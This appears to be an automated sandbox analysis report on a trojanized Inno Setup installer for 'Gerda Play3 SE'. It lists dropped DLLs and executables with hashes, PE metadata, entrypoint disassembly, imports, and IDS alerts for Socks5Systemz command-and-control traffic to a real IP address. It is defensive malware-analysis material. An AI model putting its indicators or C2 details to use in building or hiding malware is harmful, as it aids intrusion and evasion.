SSDEEP:	12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
MD5:	561FA2ABB31DFA8FAB762145F81667C2
SHA1:	C8CCB04EEDAC821A13FAE314A2435192860C72B8
SHA-256:	DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
SHA-512:	7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:\|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\msvcr71.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.542655141037356
Encrypted:	false
SSDEEP:	6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
MD5:	86F1895AE8C5E8B17D99ECE768A70732
SHA1:	D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
SHA-256:	8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
SHA-512:	3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4\|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\ssleay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	392048
Entropy (8bit):	6.542831007177094
Encrypted:	false
SSDEEP:	6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
MD5:	EE856A00410ECED8CC609936D01F954E
SHA1:	705D378626AEC86FECFDF04C86244006BC3AF431
SHA-256:	B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
SHA-512:	666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4.$QN.%4.$.N.%4.$IN.%4.$YN.%..$HN.%..$GN.%..$KN.%..$XN.%[N.%.O.%..$iN.%..$ZN.%.e%ZN.%..$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\is-GKUSE.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	720033
Entropy (8bit):	6.5224444313039385
Encrypted:	false
SSDEEP:	12288:sQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbdgUHayxyF8:sQPh1eLSSKrPD37zzH2A6QD/srqggEvM
MD5:	5F71B93A871D20C35B2FBB12D7447BEC
SHA1:	6AF9BEBF92398CA43B717302F5D0F01301DD6A21
SHA-256:	DE828915CAF8D3BFD7933018C6D5A1C2B510396EB198589244AF3EA8CAC83B0B
SHA-512:	DBA35ED038DB56F96C4EE43C203DA527F4A4D9A58A5B8C6B19087BDD7C32BF7D5B553BEB1A2AFEFE7EF5165E3C99B99A9D4D6B16CB8239707BD67C7F06C306FC
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	InnoSetup Log Gerda Play3 SE, version 0x30, 4476 bytes, 767668\user, "C:\Users\user\AppData\Local\Gerda Play3 SE"
Category:	dropped
Size (bytes):	4476
Entropy (8bit):	4.60908228428025
Encrypted:	false
SSDEEP:	96:k8Wfjv88kp/hIK9X+eOIhSv4cVSQs0LCYy:k8Wfb8vp/hyHIhxcVSQ1g
MD5:	484690B99869DD2BE827F831C6B05E9C
SHA1:	E90698F781ABA11ADFC40D24DF4633DD6B241E35
SHA-256:	A5F1ABFFBF2230997603713E5B2415FCA8B54A30568430BE7196B8A0369F2126
SHA-512:	2C7DA88CA56AB35C0A7F547AF959FD329A3330D6AE8E0FA6C44737F917C7D6D6E9E78EC8EDAE03FDCB6D00B6E90C4DDEEDAA2EA6967451B3DA116605E8723143
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................Gerda Play3 SE..................................................................................................................Gerda Play3 SE..................................................................................................................0.......\|...%......................................................................................................................O....@y\|......Q....767668.user.C:\Users\user\AppData\Local\Gerda Play3 SE.............9.... .....M......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User3

C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	720033
Entropy (8bit):	6.5224444313039385
Encrypted:	false
SSDEEP:	12288:sQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbdgUHayxyF8:sQPh1eLSSKrPD37zzH2A6QD/srqggEvM
MD5:	5F71B93A871D20C35B2FBB12D7447BEC
SHA1:	6AF9BEBF92398CA43B717302F5D0F01301DD6A21
SHA-256:	DE828915CAF8D3BFD7933018C6D5A1C2B510396EB198589244AF3EA8CAC83B0B
SHA-512:	DBA35ED038DB56F96C4EE43C203DA527F4A4D9A58A5B8C6B19087BDD7C32BF7D5B553BEB1A2AFEFE7EF5165E3C99B99A9D4D6B16CB8239707BD67C7F06C306FC
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	708608
Entropy (8bit):	6.514146996529036
Encrypted:	false
SSDEEP:	12288:UQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbdgUHayxyF:UQPh1eLSSKrPD37zzH2A6QD/srqggEvX
MD5:	499BD324F6DD0DF600B61BE36E26B612
SHA1:	4DAD284AE727350A0632B3AAB09D6EB7B9D3EC1D
SHA-256:	6F53CD1CF8A75A30ECA24BFCFE2B2F0890C3545F20A6F56356C2272A66BEE7A5
SHA-512:	92E83A502CE167873AD80A8A5EE61C40CB64B649E3CA13CEF779FE329D647BBB40B6ECD788C77B05B9AB092C38D3F9B5ADCA2F813F03F90F41FD89AFB48D4888
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.997607003853171
TrID:	Win32 Executable (generic) a (10002005/4) 98.73% Inno Setup installer (109748/4) 1.08% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	file.exe
File size:	3'298'104 bytes
MD5:	5f3d49bffed0da5d969582bd92fed715
SHA1:	6efbd680de90af1c2ac13eb1a781b3797f6714e4
SHA256:	a166a398a327a98b73d33c3ffd0ae68ae1538a79678e4e16c5977aadfa46a395
SHA512:	a3c277033c4942f6c78afa49a40f4b1a1751e7b814bde4d0bdd544dd0582010f1f77fead16cc3918eb12b8a08eb96e86e1d82be0af882ad8f34ebb8b5e7cada3
SSDEEP:	49152:e9qpl6w2Sh0/GmssmPSXQn9OjbM2u/o44rrp4F6BV6Lx45VRK7FeAir:4ml6Qh0/XUPSgFFSK6qq5VRaFKr
TLSH:	9AE53302EFFA0439F932C7B44900724394652F0D0FE19ED7A2EEA94A4EF79254939767
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x40a5f8
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	884310b1928934402ea6fec1dbd3cf5e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007F636481E483h
call 00007F636481F68Ah
call 00007F636481F919h
call 00007F636481F9BCh
call 00007F636482195Bh
call 00007F63648242C6h
call 00007F636482442Dh
xor eax, eax
push ebp
push 0040ACC9h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040AC92h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007F6364824EDBh
call 00007F6364824AC6h
cmp byte ptr [0040B234h], 00000000h
je 00007F63648259BEh
call 00007F6364824FD8h
xor eax, eax
call 00007F636481F179h
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007F6364821F6Bh
mov edx, dword ptr [ebp-10h]
mov eax, 0040CE2Ch
call 00007F636481E51Ah
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CE2Ch]
mov dl, 01h
mov eax, 0040738Ch
call 00007F63648227FAh
mov dword ptr [0040CE30h], eax
xor edx, edx
push ebp
push 0040AC4Ah
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F6364824F36h
mov dword ptr [0040CE38h], eax
mov eax, dword ptr [0040CE38h]
cmp dword ptr [eax+0Ch], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd000	0x950	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11000	0x2c00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xf000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x9d30	0x9e00	04ffdb46e50716ec8cb7db42819802fd	False	0.6052956882911392	data	6.631603395825714	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0xb000	0x250	0x400	beee52f18301950f82460d9ffe5aec7e	False	0.306640625	data	2.7547169534996403	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xc000	0xe90	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xd000	0x950	0xa00	bb5485bf968b970e5ea81292af2acdba	False	0.414453125	data	4.430733069799036	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xe000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xf000	0x18	0x200	9ba824905bf9c7922b6fc87a38b74366	False	0.052734375	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x10000	0x8c4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x11000	0x2c00	0x2c00	5305601982e1fdf0c6302dfb1a01e5a8	False	0.3340731534090909	data	4.593307861189122	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x11354	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	Dutch	Netherlands	0.5675675675675675
RT_ICON	0x1147c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	Dutch	Netherlands	0.4486994219653179
RT_ICON	0x119e4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	Dutch	Netherlands	0.4637096774193548
RT_ICON	0x11ccc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	Dutch	Netherlands	0.3935018050541516
RT_STRING	0x12574	0x2f2	data			0.35543766578249336
RT_STRING	0x12868	0x30c	data			0.3871794871794872
RT_STRING	0x12b74	0x2ce	data			0.42618384401114207
RT_STRING	0x12e44	0x68	data			0.75
RT_STRING	0x12eac	0xb4	data			0.6277777777777778
RT_STRING	0x12f60	0xae	data			0.5344827586206896
RT_RCDATA	0x13010	0x2c	data			1.1818181818181819
RT_GROUP_ICON	0x1303c	0x3e	data	English	United States	0.8387096774193549
RT_VERSION	0x1307c	0x4f4	data	English	United States	0.28470031545741326
RT_MANIFEST	0x13570	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll	MessageBoxA
oleaut32.dll	VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll	WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll	TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll	InitCommonControls
advapi32.dll	AdjustTokenPrivileges

Possible Origin

Language of compilation system	Country where language is spoken	Map
Dutch	Netherlands
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T17:31:53.456689+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57519	185.208.158.248	80	TCP
2024-09-27T17:31:56.349470+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57519	185.208.158.248	80	TCP
2024-09-27T17:31:56.885180+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57519	185.208.158.248	80	TCP
2024-09-27T17:31:58.025467+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57522	185.208.158.248	80	TCP
2024-09-27T17:31:59.024528+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57523	185.208.158.248	80	TCP
2024-09-27T17:31:59.852769+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57524	185.208.158.248	80	TCP
2024-09-27T17:32:00.689985+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57526	185.208.158.248	80	TCP
2024-09-27T17:32:01.039539+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57526	185.208.158.248	80	TCP
2024-09-27T17:32:01.393119+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57526	185.208.158.248	80	TCP
2024-09-27T17:32:01.913473+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57526	185.208.158.248	80	TCP
2024-09-27T17:32:02.267509+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57526	185.208.158.248	80	TCP
2024-09-27T17:32:03.067039+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57527	185.208.158.248	80	TCP
2024-09-27T17:32:03.418240+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57527	185.208.158.248	80	TCP
2024-09-27T17:32:04.272954+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57528	185.208.158.248	80	TCP
2024-09-27T17:32:05.215372+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57529	185.208.158.248	80	TCP
2024-09-27T17:32:06.018644+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57530	185.208.158.248	80	TCP
2024-09-27T17:32:06.373694+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57530	185.208.158.248	80	TCP
2024-09-27T17:32:07.205985+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57531	185.208.158.248	80	TCP
2024-09-27T17:32:08.108983+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57532	185.208.158.248	80	TCP
2024-09-27T17:32:08.923277+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57533	185.208.158.248	80	TCP
2024-09-27T17:32:09.753087+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57534	185.208.158.248	80	TCP
2024-09-27T17:32:10.885803+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57535	185.208.158.248	80	TCP
2024-09-27T17:32:11.795330+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57536	185.208.158.248	80	TCP
2024-09-27T17:32:12.695074+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57537	185.208.158.248	80	TCP
2024-09-27T17:32:13.253377+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57537	185.208.158.248	80	TCP
2024-09-27T17:32:14.187113+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57538	185.208.158.248	80	TCP
2024-09-27T17:32:15.019151+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57539	185.208.158.248	80	TCP
2024-09-27T17:32:15.855427+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57540	185.208.158.248	80	TCP
2024-09-27T17:32:16.706911+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57541	185.208.158.248	80	TCP
2024-09-27T17:32:17.056712+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57541	185.208.158.248	80	TCP
2024-09-27T17:32:17.927819+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57543	185.208.158.248	80	TCP
2024-09-27T17:32:18.382123+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57543	185.208.158.248	80	TCP
2024-09-27T17:32:18.733642+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57543	185.208.158.248	80	TCP
2024-09-27T17:32:19.582795+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57544	185.208.158.248	80	TCP
2024-09-27T17:32:19.931095+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57544	185.208.158.248	80	TCP
2024-09-27T17:32:20.791335+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57545	185.208.158.248	80	TCP
2024-09-27T17:32:21.648710+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57547	185.208.158.248	80	TCP
